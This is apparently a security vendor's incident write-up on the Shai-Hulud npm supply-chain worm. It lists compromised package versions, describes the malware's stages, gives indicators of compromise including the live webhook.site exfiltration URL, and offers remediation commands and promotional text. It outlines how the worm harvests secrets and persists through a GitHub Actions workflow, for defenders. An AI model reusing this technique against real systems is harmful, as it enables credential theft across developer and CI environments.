@operato/utils@9.0.35@operatoutils9.0.35PREVIOUS REPORT
@operato/utils@9.0.36@operatoutils9.0.36PREVIOUS REPORT
@operato/utils@9.0.37@operatoutils9.0.37PREVIOUS REPORT
@operato/utils@9.0.38@operatoutils9.0.38PREVIOUS REPORT
@operato/utils@9.0.39@operatoutils9.0.39PREVIOUS REPORT
@operato/utils@9.0.40@operatoutils9.0.40PREVIOUS REPORT
@operato/utils@9.0.41@operatoutils9.0.41PREVIOUS REPORT
@operato/utils@9.0.42@operatoutils9.0.42PREVIOUS REPORT
@operato/utils@9.0.43@operatoutils9.0.43PREVIOUS REPORT
@operato/utils@9.0.44@operatoutils9.0.44PREVIOUS REPORT
@operato/utils@9.0.45@operatoutils9.0.45PREVIOUS REPORT
@operato/utils@9.0.46@operatoutils9.0.46PREVIOUS REPORT
@operato/utils@9.0.47@operatoutils9.0.47PREVIOUS REPORT
@operato/utils@9.0.48@operatoutils9.0.48NEW FINDING
@operato/utils@9.0.49@operatoutils9.0.49PREVIOUS REPORT
@operato/utils@9.0.50@operatoutils9.0.50PREVIOUS REPORT
@operato/utils@9.0.51@operatoutils9.0.51PREVIOUS REPORT
@rxap/ngx-bootstrap@19.0.3@rxapngx-bootstrap19.0.3PREVIOUS REPORT
@rxap/ngx-bootstrap@19.0.4@rxapngx-bootstrap19.0.4PREVIOUS REPORT
@teriyakibomb/ember-velcro@2.2.1@teriyakibombember-velcro2.2.1NEW FINDING
@teselagen/bio-parsers@0.4.30@teselagenbio-parsers0.4.30PREVIOUS REPORT
@teselagen/bounce-loader@0.3.16@teselagenbounce-loader0.3.16PREVIOUS REPORT
@teselagen/bounce-loader@0.3.17@teselagenbounce-loader0.3.17PREVIOUS REPORT
@teselagen/file-utils@0.3.22@teselagenfile-utils0.3.22PREVIOUS REPORT
@teselagen/liquibase-tools@0.4.1@teselagenliquibase-tools0.4.1PREVIOUS REPORT
@teselagen/ove@0.7.40@teselagenove0.7.40PREVIOUS REPORT
@teselagen/range-utils@0.3.14@teselagenrange-utils0.3.14PREVIOUS REPORT
@teselagen/range-utils@0.3.15@teselagenrange-utils0.3.15PREVIOUS REPORT
@teselagen/react-list@0.8.19@teselagenreact-list0.8.19PREVIOUS REPORT
@teselagen/react-list@0.8.20@teselagenreact-list0.8.20PREVIOUS REPORT
@teselagen/react-table@6.10.19@teselagenreact-table6.10.19PREVIOUS REPORT
@teselagen/react-table@6.10.20@teselagenreact-table6.10.20PREVIOUS REPORT
@teselagen/react-table@6.10.22@teselagenreact-table6.10.22PREVIOUS REPORT
@teselagen/sequence-utils@0.3.34@teselagensequence-utils0.3.34PREVIOUS REPORT
@teselagen/ui@0.9.10@teselagenui0.9.10PREVIOUS REPORT
@thangved/callback-window@1.1.4@thangvedcallback-window1.1.4PREVIOUS REPORT
@things-factory/attachment-base@9.0.42@things-factoryattachment-base9.0.42PREVIOUS REPORT
@things-factory/attachment-base@9.0.43@things-factoryattachment-base9.0.43PREVIOUS REPORT
@things-factory/attachment-base@9.0.44@things-factoryattachment-base9.0.44PREVIOUS REPORT
@things-factory/attachment-base@9.0.45@things-factoryattachment-base9.0.45PREVIOUS REPORT
@things-factory/attachment-base@9.0.46@things-factoryattachment-base9.0.46PREVIOUS REPORT
@things-factory/attachment-base@9.0.47@things-factoryattachment-base9.0.47PREVIOUS REPORT
@things-factory/attachment-base@9.0.48@things-factoryattachment-base9.0.48PREVIOUS REPORT
@things-factory/attachment-base@9.0.49@things-factoryattachment-base9.0.49PREVIOUS REPORT
@things-factory/attachment-base@9.0.50@things-factoryattachment-base9.0.50PREVIOUS REPORT
@things-factory/attachment-base@9.0.51@things-factoryattachment-base9.0.51PREVIOUS REPORT
@things-factory/attachment-base@9.0.52@things-factoryattachment-base9.0.52PREVIOUS REPORT
@things-factory/attachment-base@9.0.53@things-factoryattachment-base9.0.53PREVIOUS REPORT
@things-factory/attachment-base@9.0.54@things-factoryattachment-base9.0.54PREVIOUS REPORT
@things-factory/attachment-base@9.0.55@things-factoryattachment-base9.0.55PREVIOUS REPORT
@things-factory/auth-base@9.0.42@things-factoryauth-base9.0.42PREVIOUS REPORT
@things-factory/auth-base@9.0.43@things-factoryauth-base9.0.43PREVIOUS REPORT
@things-factory/auth-base@9.0.44@things-factoryauth-base9.0.44PREVIOUS REPORT
@things-factory/auth-base@9.0.45@things-factoryauth-base9.0.45PREVIOUS REPORT
@things-factory/email-base@9.0.42@things-factoryemail-base9.0.42PREVIOUS REPORT
@things-factory/email-base@9.0.43@things-factoryemail-base9.0.43PREVIOUS REPORT
@things-factory/email-base@9.0.44@things-factoryemail-base9.0.44PREVIOUS REPORT
@things-factory/email-base@9.0.45@things-factoryemail-base9.0.45PREVIOUS REPORT
@things-factory/email-base@9.0.46@things-factoryemail-base9.0.46PREVIOUS REPORT
@things-factory/email-base@9.0.47@things-factoryemail-base9.0.47PREVIOUS REPORT
@things-factory/email-base@9.0.48@things-factoryemail-base9.0.48PREVIOUS REPORT
@things-factory/email-base@9.0.49@things-factoryemail-base9.0.49PREVIOUS REPORT
@things-factory/email-base@9.0.50@things-factoryemail-base9.0.50PREVIOUS REPORT
@things-factory/email-base@9.0.51@things-factoryemail-base9.0.51PREVIOUS REPORT
@things-factory/email-base@9.0.52@things-factoryemail-base9.0.52PREVIOUS REPORT
@things-factory/email-base@9.0.53@things-factoryemail-base9.0.53PREVIOUS REPORT
@things-factory/email-base@9.0.54@things-factoryemail-base9.0.54PREVIOUS REPORT
@things-factory/email-base@9.0.55@things-factoryemail-base9.0.55PREVIOUS REPORT
@things-factory/email-base@9.0.56@things-factoryemail-base9.0.56PREVIOUS REPORT
@things-factory/email-base@9.0.57@things-factoryemail-base9.0.57PREVIOUS REPORT
@things-factory/email-base@9.0.58@things-factoryemail-base9.0.58PREVIOUS REPORT
@things-factory/email-base@9.0.59@things-factoryemail-base9.0.59PREVIOUS REPORT
@things-factory/env@9.0.42@things-factoryenv9.0.42PREVIOUS REPORT
@things-factory/env@9.0.43@things-factoryenv9.0.43PREVIOUS REPORT
@things-factory/env@9.0.44@things-factoryenv9.0.44PREVIOUS REPORT
@things-factory/env@9.0.45@things-factoryenv9.0.45PREVIOUS REPORT
@things-factory/integration-base@9.0.42@things-factoryintegration-base9.0.42PREVIOUS REPORT
@things-factory/integration-base@9.0.43@things-factoryintegration-base9.0.43PREVIOUS REPORT
@things-factory/integration-base@9.0.44@things-factoryintegration-base9.0.44PREVIOUS REPORT
@things-factory/integration-base@9.0.45@things-factoryintegration-base9.0.45PREVIOUS REPORT
@things-factory/integration-marketplace@9.0.43@things-factoryintegration-marketplace9.0.43PREVIOUS REPORT
@things-factory/integration-marketplace@9.0.44@things-factoryintegration-marketplace9.0.44PREVIOUS REPORT
@things-factory/integration-marketplace@9.0.45@things-factoryintegration-marketplace9.0.45PREVIOUS REPORT
@things-factory/shell@9.0.42@things-factoryshell9.0.42PREVIOUS REPORT
@things-factory/shell@9.0.43@things-factoryshell9.0.43PREVIOUS REPORT
@things-factory/shell@9.0.44@things-factoryshell9.0.44PREVIOUS REPORT
@things-factory/shell@9.0.45@things-factoryshell9.0.45PREVIOUS REPORT
@tnf-dev/api@1.0.8@tnf-devapi1.0.8PREVIOUS REPORT
@tnf-dev/core@1.0.8@tnf-devcore1.0.8PREVIOUS REPORT
@tnf-dev/js@1.0.8@tnf-devjs1.0.8PREVIOUS REPORT
@tnf-dev/mui@1.0.8@tnf-devmui1.0.8PREVIOUS REPORT
@tnf-dev/react@1.0.8@tnf-devreact1.0.8PREVIOUS REPORT
@ui-ux-gang/devextreme-angular-rpk@24.1.7@ui-ux-gangdevextreme-angular-rpk24.1.7PREVIOUS REPORT
@yoobic/design-system@6.5.17@yoobicdesign-system6.5.17PREVIOUS REPORT
@yoobic/jpeg-camera-es6@1.0.13@yoobicjpeg-camera-es61.0.13PREVIOUS REPORT
@yoobic/yobi@8.7.53@yoobicyobi8.7.53PREVIOUS REPORT
airchief@0.3.1 airchief0.3.1PREVIOUS REPORT
airpilot@0.8.8 airpilot0.8.8PREVIOUS REPORT
angulartics2@14.1.1 angulartics214.1.1PREVIOUS REPORT
angulartics2@14.1.2 angulartics214.1.2PREVIOUS REPORT
another-shai@1.0.1 another-shai1.0.1PREVIOUS REPORT
browser-webdriver-downloader@3.0.8 browser-webdriver-downloader3.0.8PREVIOUS REPORT
capacitor-notificationhandler@0.0.2 capacitor-notificationhandler0.0.2PREVIOUS REPORT
capacitor-notificationhandler@0.0.3 capacitor-notificationhandler0.0.3PREVIOUS REPORT
capacitor-plugin-healthapp@0.0.2 capacitor-plugin-healthapp0.0.2PREVIOUS REPORT
capacitor-plugin-healthapp@0.0.3 capacitor-plugin-healthapp0.0.3PREVIOUS REPORT
capacitor-plugin-ihealth@1.1.8 capacitor-plugin-ihealth1.1.8PREVIOUS REPORT
capacitor-plugin-ihealth@1.1.9 capacitor-plugin-ihealth1.1.9PREVIOUS REPORT
capacitor-plugin-vonage@1.0.2 capacitor-plugin-vonage1.0.2PREVIOUS REPORT
capacitor-plugin-vonage@1.0.3 capacitor-plugin-vonage1.0.3PREVIOUS REPORT
capacitorandroidpermissions@0.0.4 capacitorandroidpermissions0.0.4PREVIOUS REPORT
capacitorandroidpermissions@0.0.5 capacitorandroidpermissions0.0.5PREVIOUS REPORT
config-cordova@0.8.5 config-cordova0.8.5PREVIOUS REPORT
cordova-plugin-voxeet2@1.0.24 cordova-plugin-voxeet21.0.24PREVIOUS REPORT
cordova-voxeet@1.0.32 cordova-voxeet1.0.32PREVIOUS REPORT
create-hest-app@0.1.9 create-hest-app0.1.9PREVIOUS REPORT
db-evo@1.1.4 db-evo1.1.4PREVIOUS REPORT
db-evo@1.1.5 db-evo1.1.5PREVIOUS REPORT
devextreme-angular-rpk@21.2.8 devextreme-angular-rpk21.2.8PREVIOUS REPORT
ember-browser-services@5.0.2 ember-browser-services5.0.2PREVIOUS REPORT
ember-browser-services@5.0.3 ember-browser-services5.0.3PREVIOUS REPORT
ember-headless-form-yup@1.0.1 ember-headless-form-yup1.0.1PREVIOUS REPORT
ember-headless-form@1.1.2 ember-headless-form1.1.2PREVIOUS REPORT
ember-headless-form@1.1.3 ember-headless-form1.1.3PREVIOUS REPORT
ember-headless-table@2.1.5 ember-headless-table2.1.5PREVIOUS REPORT
ember-headless-table@2.1.6 ember-headless-table2.1.6PREVIOUS REPORT
ember-url-hash-polyfill@1.0.12 ember-url-hash-polyfill1.0.12PREVIOUS REPORT
ember-url-hash-polyfill@1.0.13 ember-url-hash-polyfill1.0.13PREVIOUS REPORT
ember-velcro@2.2.1 ember-velcro2.2.1PREVIOUS REPORT
ember-velcro@2.2.2 ember-velcro2.2.2PREVIOUS REPORT
encounter-playground@0.0.2 encounter-playground0.0.2PREVIOUS REPORT
encounter-playground@0.0.3 encounter-playground0.0.3PREVIOUS REPORT
encounter-playground@0.0.4 encounter-playground0.0.4PREVIOUS REPORT
encounter-playground@0.0.5 encounter-playground0.0.5PREVIOUS REPORT
eslint-config-crowdstrike-node@4.0.3 eslint-config-crowdstrike-node4.0.3PREVIOUS REPORT
eslint-config-crowdstrike-node@4.0.4 eslint-config-crowdstrike-node4.0.4PREVIOUS REPORT
eslint-config-crowdstrike@11.0.2 eslint-config-crowdstrike11.0.2PREVIOUS REPORT
eslint-config-crowdstrike@11.0.3 eslint-config-crowdstrike11.0.3PREVIOUS REPORT
eslint-config-teselagen@6.1.7 eslint-config-teselagen6.1.7PREVIOUS REPORT
eslint-config-teselagen@6.1.8 eslint-config-teselagen6.1.8PREVIOUS REPORT
globalize-rpk@1.7.4 globalize-rpk1.7.4PREVIOUS REPORT
graphql-sequelize-teselagen@5.3.8 graphql-sequelize-teselagen5.3.8PREVIOUS REPORT
graphql-sequelize-teselagen@5.3.9 graphql-sequelize-teselagen5.3.9PREVIOUS REPORT
html-to-base64-image@1.0.2 html-to-base64-image1.0.2PREVIOUS REPORT
json-rules-engine-simplified@0.2.1 json-rules-engine-simplified0.2.1PREVIOUS REPORT
json-rules-engine-simplified@0.2.4 json-rules-engine-simplified0.2.4PREVIOUS REPORT
jumpgate@0.0.2 jumpgate0.0.2PREVIOUS REPORT
koa2-swagger-ui@5.11.1 koa2-swagger-ui5.11.1PREVIOUS REPORT
koa2-swagger-ui@5.11.2 koa2-swagger-ui5.11.2PREVIOUS REPORT
mcfly-semantic-release@1.3.1 mcfly-semantic-release1.3.1PREVIOUS REPORT
mcp-knowledge-base@0.0.2 mcp-knowledge-base0.0.2PREVIOUS REPORT
mcp-knowledge-graph@1.2.1 mcp-knowledge-graph1.2.1PREVIOUS REPORT
mobioffice-cli@1.0.3 mobioffice-cli1.0.3PREVIOUS REPORT
monorepo-next@13.0.1 monorepo-next13.0.1PREVIOUS REPORT
monorepo-next@13.0.2 monorepo-next13.0.2PREVIOUS REPORT
mstate-angular@0.4.4 mstate-angular0.4.4PREVIOUS REPORT
mstate-cli@0.4.7 mstate-cli0.4.7PREVIOUS REPORT
mstate-dev-react@1.1.1 mstate-dev-react1.1.1PREVIOUS REPORT
mstate-react@1.6.5 mstate-react1.6.5PREVIOUS REPORT
ng2-file-upload@7.0.2 ng2-file-upload7.0.2PREVIOUS REPORT
ng2-file-upload@7.0.3 ng2-file-upload7.0.3PREVIOUS REPORT
ng2-file-upload@8.0.1 ng2-file-upload8.0.1PREVIOUS REPORT
ng2-file-upload@8.0.2 ng2-file-upload8.0.2PREVIOUS REPORT
ng2-file-upload@8.0.3 ng2-file-upload8.0.3PREVIOUS REPORT
ng2-file-upload@9.0.1 ng2-file-upload9.0.1PREVIOUS REPORT
ngx-bootstrap@18.1.4 ngx-bootstrap18.1.4PREVIOUS REPORT
ngx-bootstrap@19.0.3 ngx-bootstrap19.0.3PREVIOUS REPORT
ngx-bootstrap@19.0.4 ngx-bootstrap19.0.4PREVIOUS REPORT
ngx-bootstrap@20.0.3 ngx-bootstrap20.0.3PREVIOUS REPORT
ngx-bootstrap@20.0.4 ngx-bootstrap20.0.4PREVIOUS REPORT
ngx-bootstrap@20.0.5 ngx-bootstrap20.0.5PREVIOUS REPORT
ngx-color@10.0.1 ngx-color10.0.1PREVIOUS REPORT
ngx-color@10.0.2 ngx-color10.0.2PREVIOUS REPORT
ngx-toastr@19.0.1 ngx-toastr19.0.1PREVIOUS REPORT
ngx-toastr@19.0.2 ngx-toastr19.0.2PREVIOUS REPORT
ngx-trend@8.0.1 ngx-trend8.0.1PREVIOUS REPORT
ngx-ws@1.1.5 ngx-ws1.1.5PREVIOUS REPORT
ngx-ws@1.1.6 ngx-ws1.1.6PREVIOUS REPORT
oradm-to-gql@35.0.14 oradm-to-gql35.0.14PREVIOUS REPORT
oradm-to-gql@35.0.15 oradm-to-gql35.0.15PREVIOUS REPORT
oradm-to-sqlz@1.1.2 oradm-to-sqlz1.1.2PREVIOUS REPORT
ove-auto-annotate@0.0.10 ove-auto-annotate0.0.10PREVIOUS REPORT
ove-auto-annotate@0.0.9 ove-auto-annotate0.0.9PREVIOUS REPORT
pm2-gelf-json@1.0.4 pm2-gelf-json1.0.4PREVIOUS REPORT
pm2-gelf-json@1.0.5 pm2-gelf-json1.0.5PREVIOUS REPORT
printjs-rpk@1.6.1 printjs-rpk1.6.1PREVIOUS REPORT
react-complaint-image@0.0.32 react-complaint-image0.0.32PREVIOUS REPORT
react-complaint-image@0.0.35 react-complaint-image0.0.35PREVIOUS REPORT
react-jsonschema-form-conditionals@0.3.18 react-jsonschema-form-conditionals0.3.18PREVIOUS REPORT
react-jsonschema-form-conditionals@0.3.21 react-jsonschema-form-conditionals0.3.21PREVIOUS REPORT
react-jsonschema-form-extras@1.0.4 react-jsonschema-form-extras1.0.4PREVIOUS REPORT
react-jsonschema-rxnt-extras@0.4.9 react-jsonschema-rxnt-extras0.4.9PREVIOUS REPORT
remark-preset-lint-crowdstrike@4.0.1 remark-preset-lint-crowdstrike4.0.1PREVIOUS REPORT
remark-preset-lint-crowdstrike@4.0.2 remark-preset-lint-crowdstrike4.0.2PREVIOUS REPORT
rxnt-authentication@0.0.3 rxnt-authentication0.0.3PREVIOUS REPORT
rxnt-authentication@0.0.4 rxnt-authentication0.0.4PREVIOUS REPORT
rxnt-authentication@0.0.5 rxnt-authentication0.0.5PREVIOUS REPORT
rxnt-authentication@0.0.6 rxnt-authentication0.0.6PREVIOUS REPORT
rxnt-healthchecks-nestjs@1.0.2 rxnt-healthchecks-nestjs1.0.2PREVIOUS REPORT
rxnt-healthchecks-nestjs@1.0.3 rxnt-healthchecks-nestjs1.0.3PREVIOUS REPORT
rxnt-healthchecks-nestjs@1.0.4 rxnt-healthchecks-nestjs1.0.4PREVIOUS REPORT
rxnt-healthchecks-nestjs@1.0.5 rxnt-healthchecks-nestjs1.0.5PREVIOUS REPORT
rxnt-kue@1.0.4 rxnt-kue1.0.4PREVIOUS REPORT
rxnt-kue@1.0.5 rxnt-kue1.0.5PREVIOUS REPORT
rxnt-kue@1.0.6 rxnt-kue1.0.6PREVIOUS REPORT
rxnt-kue@1.0.7 rxnt-kue1.0.7PREVIOUS REPORT
swc-plugin-component-annotate@1.9.1 swc-plugin-component-annotate1.9.1PREVIOUS REPORT
swc-plugin-component-annotate@1.9.2 swc-plugin-component-annotate1.9.2PREVIOUS REPORT
tbssnch@1.0.2 tbssnch1.0.2PREVIOUS REPORT
teselagen-interval-tree@1.1.2 teselagen-interval-tree1.1.2PREVIOUS REPORT
tg-client-query-builder@2.14.4 tg-client-query-builder2.14.4PREVIOUS REPORT
tg-client-query-builder@2.14.5 tg-client-query-builder2.14.5PREVIOUS REPORT
tg-redbird@1.3.1 tg-redbird1.3.1PREVIOUS REPORT
tg-redbird@1.3.2 tg-redbird1.3.2PREVIOUS REPORT
tg-seq-gen@1.0.10 tg-seq-gen1.0.10PREVIOUS REPORT
tg-seq-gen@1.0.9 tg-seq-gen1.0.9PREVIOUS REPORT
thangved-react-grid@1.0.3 thangved-react-grid1.0.3PREVIOUS REPORT
ts-gaussian@3.0.5 ts-gaussian3.0.5PREVIOUS REPORT
ts-gaussian@3.0.6 ts-gaussian3.0.6PREVIOUS REPORT
ts-imports@1.0.1 ts-imports1.0.1PREVIOUS REPORT
ts-imports@1.0.2 ts-imports1.0.2PREVIOUS REPORT
tvi-cli@0.1.5 tvi-cli0.1.5PREVIOUS REPORT
ve-bamreader@0.2.6 ve-bamreader0.2.6PREVIOUS REPORT
ve-bamreader@0.2.7 ve-bamreader0.2.7PREVIOUS REPORT
ve-editor@1.0.1 ve-editor1.0.1PREVIOUS REPORT
ve-editor@1.0.2 ve-editor1.0.2PREVIOUS REPORT
verror-extra@6.0.1 verror-extra6.0.1PREVIOUS REPORT
voip-callkit@1.0.2 voip-callkit1.0.2PREVIOUS REPORT
voip-callkit@1.0.3 voip-callkit1.0.3PREVIOUS REPORT
wdio-web-reporter@0.1.3 wdio-web-reporter0.1.3PREVIOUS REPORT
yargs-help-output@5.0.3 yargs-help-output5.0.3PREVIOUS REPORT
yoo-styles@6.0.326 yoo-styles6.0.326PREVIOUS REPORT

The payload under the microscope

Stage 1: Recon and environment sweep

  • OS/arch profile using os.platform() and os.arch() to tailor a TruffleHog download.
  • Env dump to harvest any exported credentials: GITHUB_TOKEN, NPM_TOKEN, AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, cloud CLI creds, and CI secrets that occasionally leak into runner envs.

Stage 2: Secrets harvesting

  • Local filesystem scan: invokes TruffleHog as a child process (filesystem / –json) to trawl for high-entropy secrets across developer machines or CI agents.
  • Cloud secret managers: enumerates AWS Secrets Manager and GCP Secret Manager, with pagination and silent error handling. This is notable—many “npm malware” strains stop at environment variables; this one reaches into managed secret stores if credentials are present.

Stage 3: Token validation and lateral reach

  • npm identity: /-/whoami used to confirm token validity, then the code pivots to maintainer package discovery via registry search.
  • GitHub reach: if a token exists, calls /user and repo APIs, plants a workflow, and creates branches to persist the backdoor beyond the original host.

Stage 4: Persistence via GitHub Actions

  • Workflow path: .github/workflows/shai-hulud-workflow.yml.
  • Function: serialize secrets, double- or triple-base64 content, and POST to a webhook[.]site collector.
  • Risk: once committed, any future CI run leaks secrets again. Token rotation alone won’t save you unless you also remove the workflow and force a clean history.

Indicators of Compromise (IoCs)

  • Malicious file: bundle.js

    SHA-256: 46faab8ab153fae6e80e7cca38eab363075bb524edd79e42269217a083628f09
  • 46faab8ab153fae6e80e7cca38eab363075bb524edd79e42269217a083628f09 
  • de0e25a3e6c1e1e5998b306b7141b3dc4c0088da9d7bb47c1c00c91e6e4f85d6
  • 81d2a004a1bca6ef87a1caf7d0e0b355ad1764238e40ff6d1b1cb77ad4f595c3
  • 83a650ce44b2a9854802a7fb4c202877815274c129af49e6c2d1d5d5d55c501e
  • 4b2399646573bb737c4969563303d8ee2e9ddbd1b271f1ca9e35ea78062538db
  • dc67467a39b70d1cd4c1f7f7a459b35058163592f4a9e8fb4dffcbba98ef210c
  • 46faab8ab153fae6e80e7cca38eab363075bb524edd79e42269217a083628f09
  • b74caeaa75e077c99f7d44f46daaf9796a3be43ecf24f2a1fd381844669da777
  • Backdoor workflow: .github/workflows/shai-hulud-workflow.yml
  • C2 / exfil: https://webhook.site/bb8ca5f6-4175-45d2-b042-fc9ebb8170b7 (defang if sharing internally).
  • Suspicious behaviors: npm publish –force, TruffleHog invocation filesystem / –json, npm registry maintainer search (/v1/search?text=maintainer:), GitHub repo and contents writes, secretsmanager API calls. (link to Socket)

Immediate response playbook (copy/paste friendly)

1) Hunt and eradicate the packages

# Check for affected packages (example: tinycolor)

npm ls @ctrl/tinycolor

# Force remove compromised versions (replace with your offenders)

npm uninstall @ctrl/tinycolor

npm cache verify

Cross-check your lockfiles for any of the versions listed above; pin to known-good releases and re-vendor locks.

Note that this checks only first-level dependencies

2) Remove the GitHub Actions backdoor

# From each repo’s root

rm -f .github/workflows/shai-hulud-workflow.yml

# Look for a lingering branch across all repos in an org

gh repo list YOUR_ORG –limit 1000 –json nameWithOwner –jq ‘.[].nameWithOwner’ \

| while read repo; do

  gh api “repos/$repo/branches” –jq ‘.[] | select(.name == “shai-hulud”) | “‘$repo’ has branch: ” + .name’

done

# If found, delete it

git push origin –delete shai-hulud

The persistence risk sits in CI. Scrub workflow files in all repos, including forks and archived projects where secrets still live.

3) Rotate credentials with blast-radius thinking

  • GitHub: personal access tokens, Actions secrets (org, env, repo), deploy keys, OAuth app grants.
  • npm: automation tokens and publish tokens—replace ~/.npmrc everywhere.
  • Cloud: AWS IAM keys, GCP SA keys, Azure SP credentials; regenerate and scope tightly.
  • Secret stores: rotate values in AWS Secrets Manager and GCP Secret Manager that were accessed during the window.

4) Audit logs for exploitation

  • AWS CloudTrail (examples):

aws cloudtrail lookup-events –lookup-attributes AttributeKey=EventName,AttributeValue=ListSecrets

aws cloudtrail lookup-events –lookup-attributes AttributeKey=EventName,AttributeValue=GetSecretValue

  • GCP Audit Logs:

gcloud logging read ‘resource.type=secretmanager.googleapis.com’ –limit=200

gcloud logging read ‘protoPayload.methodName=google.iam.admin.v1.CreateServiceAccountKey’ –limit=50

5) Network containment

  • Block outbound to webhook.site at your egress controls and proxy. Search historical logs for requests to the exact exfil URL.

DevSecOps guardrails that actually change outcomes

This campaign rode on two realities: trust in maintainer updates and permissive publish paths. You can blunt both.

Package intake discipline for npm

  • Adopt a cooldown: delay brand-new package versions by 48–72h in pipelines. Most malicious releases get caught inside a day. StepSecurity’s Package Cooldown Check automates this gate. pnpm added a minimumReleaseAge setting for the same reason; similar features exist in Taze/NCU workflows.
  • Artifact provenance: require provenance/SLSA attestations where available; block un-attested publishes in CI.
  • Lockfile policy: single owner for dependency updates, reproducible builders, and a rule that no production deploy occurs within the same PR that bumps a critical transitive unless a security exception is signed.

Publisher and registry hygiene

  • Publisher hardening: enforce hardware-backed 2FA for maintainer accounts; don’t reuse SSO providers or email factors; monitor for 2FA reset phish across corporate mail.
  • Automated anomaly detection: watch for publishes that do not originate from your authorized CI/CD. Tools like StepSecurity Artifact Monitor or equivalent homegrown checks can flag “hand-pushed” packages.

GitHub Actions blast-radius controls

  • Mandatory review for workflow changes (workflow file-path protections + CODEOWNERS).
  • Untrusted code path: run npm install of untrusted branches on isolated runners with no org secrets; prefer job-level permissions: that default to read-all.
  • Secret minimalism: removed or masked secrets by default; use OIDC with constrained audience/claims over long-lived PATs.

Build agent hardening

  • Egress filters for runners; e.g., block webhook.site and similar pastebins.
  • Read-only tokens where possible; ephemeral tokens everywhere else.
  • Filesystem risk: developer laptops and CI hosts often hold .npmrc, .aws/credentials, and ~/.git-credentials. Treat them as secrets vaults; disk encryption and agent isolation aren’t “nice to have”.

How ASPM helps you get ahead of the next one

You can’t win this with scanners alone. You need continuous context:

  • Unified risk view across code → pipeline → runtime
    Map where each dependency lands, which pipelines can publish, what secrets live in those pipelines, and which apps inherit those risks. That’s ASPM territory: one backlog per team, dedupe by context, and focus remediation where reachability and blast radius intersect.
  • Reachability-aware dependency policy
    If a trojanized library is unreachable at runtime, don’t halt a release; if it’s reachable in critical paths, raise the gate. Tie this to your SCA/SBOM and CI policy so the decision is automatic.
  • Provenance-based exceptions
    Write the rule once: only allow npm publishes signed by your CI service account with attested provenance; quarantine everything else. When the next attack drops, your policy blocks it by default while you investigate.
  • Campaign-based remediation
    Treat this like a campaign: remove backdoor workflow, rotate tokens, re-pin affected versions, sweep org repos. Track it in your vulnerability management backlog as a single supply chain incident with child tasks per team—this reduces fatigue versus spraying dozens of tickets.

Triage checklist for security and platform teams

  1. Inventory: generate a dependency SBOM and diff against the version list above.
  2. Resolve: pin to safe versions; rebuild containers and serverless layers.
  3. Pipelines: scan repos for .github/workflows/shai-hulud-workflow.yml; delete; force a clean commit that removes it; protect the workflows/ path.
  4. Secrets: rotate npm, GitHub, cloud, and third-party tokens; re-issue OIDC workloads.
  5. Forensics: search logs for webhook.site egress and CloudTrail/GCP Secret Manager access.
  6. Comms: notify impacted developers; share detox steps for local machines (remove backdoor workflow clones, clear caches, re-auth CLI tools).
  7. Policy: enable version cooldown and provenance gates in PR checks; require approvals for workflow changes.

Notes on maintainers and attribution

  • The npm account scttcper (Scott Cooper) publishes many @ctrl/* libraries, including @ctrl/tinycolor. Treat any installs of recently published versions with care and verify the source timeline before unblocking.
  • Initial alert: credits include Daniel dos Santos Pereira for flagging the suspicious @ctrl/tinycolor update; Socket and StepSecurity published deep dives and kept the package list current as the story evolved.

References and further reading

  • StepSecurity: full technical breakdown, IoCs, remediation guidance for the bundle.js campaign.
  • Socket Research: analysis of the tinycolor incident and Nx attack wave; lists affected versions and details on token validation, AI-assisted exfil in related incidents.
  • The Hacker News: concise summary of the 40-package compromise with the fixed package list and exfil workflow details.
  • npm maintainer profile (scttcper) for publisher context and recent publishes.
  • Daniel Pereira for the initial alert

Final word: hold the line on package intake

Speed is the attacker’s ally here: release, wait for installs, drain secrets, and ride CI persistence. Slow them down. Bake cooldown, provenance, and workflow-path protections into your DevSecOps pipelines. Let your ASPM practice decide what gets blocked, what gets quarantined, and what needs a hotfix, based on reachability and blast radius.

Get on top of your code and container vulnerabilities with Phoenix Security Actionable ASPM

attack graph phoenix security
ASPM

Organizations often face an overwhelming volume of security alerts, including false positives and duplicate vulnerabilities, which can distract from real threats. Traditional tools may overwhelm engineers with lengthy, misaligned lists that fail to reflect business objectives or the risk tolerance of product owners.

Phoenix Security offers a transformative solution through its Actionable Application Security Posture Management (ASPM), powered by AI-based Contextual Quantitative analysis. This innovative approach correlates runtime data with code analysis to deliver a single, prioritized list of vulnerabilities. This list is tailored to the specific needs of engineering teams and aligns with executive goals, reducing noise and focusing efforts on the most critical issues. Why do people talk about Phoenix

Automated Triage: Phoenix streamlines the triage process using a customizable 4D risk formula, ensuring critical vulnerabilities are addressed promptly by the right teams.

Contextual Deduplication: Utilizing canary token-based traceability, Phoenix accurately deduplicates and tracks vulnerabilities within application code and deployment environments, allowing teams to concentrate on genuine threats.

Actionable Threat Intelligence: Phoenix provides real-time insights into vulnerabilities’ exploitability, combining runtime threat intelligence with application security data for precise risk mitigation.

ASPm, CISA KEV, Remote Code Execution, Inforamtion Leak, Category, Impact, MITRE&ATTACK, AI Assessment, Phoenix CISA KEV, Threat intelligence

By leveraging Phoenix Security, you not only unravel the potential threats but also take a significant stride in vulnerability management, ensuring your application security remains up to date and focuses on the key vulnerabilities.

Get in control of your Application Security posture and Vulnerability management

Get on top of your code and container vulnerabilities with Phoenix Security Actionable ASPM powered by AI-based Reachability Analysis

attack graph phoenix security
ASPM

Organizations often face an overwhelming volume of security alerts, including false positives and duplicate vulnerabilities, which can distract from real threats. Traditional tools may overwhelm engineers with lengthy, misaligned lists that fail to reflect business objectives or the risk tolerance of product owners.

Phoenix Security offers a transformative solution through its Actionable Application Security Posture Management (ASPM), powered by AI-based Contextual Quantitative analysis. This innovative approach correlates runtime data with code analysis to deliver a single, prioritized list of vulnerabilities. This list is tailored to the specific needs of engineering teams and aligns with executive goals, reducing noise and focusing efforts on the most critical issues.

Why do people talk about Phoenix?

Automated Triage: Phoenix streamlines the triage process using a customizable 4D risk formula, ensuring critical vulnerabilities are addressed promptly by the right teams.

• Contextual Deduplication with reachability analysis: Utilizing canary token-based traceability for network reachability and static and dynamic runtime reachability, Phoenix accurately deduplicates and tracks vulnerabilities within application code and deployment environments, allowing teams to concentrate on genuine threats.

Actionable Threat Intelligence: Phoenix provides real-time insights into vulnerabilities’ exploitability, combining runtime threat intelligence with application security data for precise risk mitigation.

ASPm, CISA KEV, Remote Code Execution, Inforamtion Leak, Category, Impact, MITRE&ATTACK, AI Assessment, Phoenix CISA KEV, Threat intelligence

By leveraging Phoenix Security, you not only unravel the potential threats but also take a significant stride in vulnerability management, ensuring your application security remains up to date and focuses on the key vulnerabilities.

